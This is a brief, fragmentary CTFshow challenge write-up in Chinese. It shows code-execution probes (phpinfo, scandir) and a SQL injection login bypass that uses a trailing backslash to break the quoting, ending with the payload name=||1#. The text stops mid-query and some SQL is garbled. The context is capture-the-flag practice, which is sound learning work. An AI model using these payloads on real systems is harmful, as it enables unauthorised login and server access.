CTFshow做题笔记

code=phpinfo(); 先看下disable_function，有一堆过滤。并且open_basedir做了目录限制。 code=var_dump(scandir(".")); 登录的时候抓个包，比如我们传name=123会返回sql语句 select count( ) from ctfshow_users where username = '123' or nickname = '123' 然后试了下单引号，发现会被吞。 那就试下反斜杠， select count( ) from ctfshow_users where username = '123\' or nickname = '123\' 这样相当于执行 select count( ) from ctfshow_users where username = 'xxx'123\' 所以先整个万能密码 name=||1# 最终语句为 select count( ) from ctfshow_users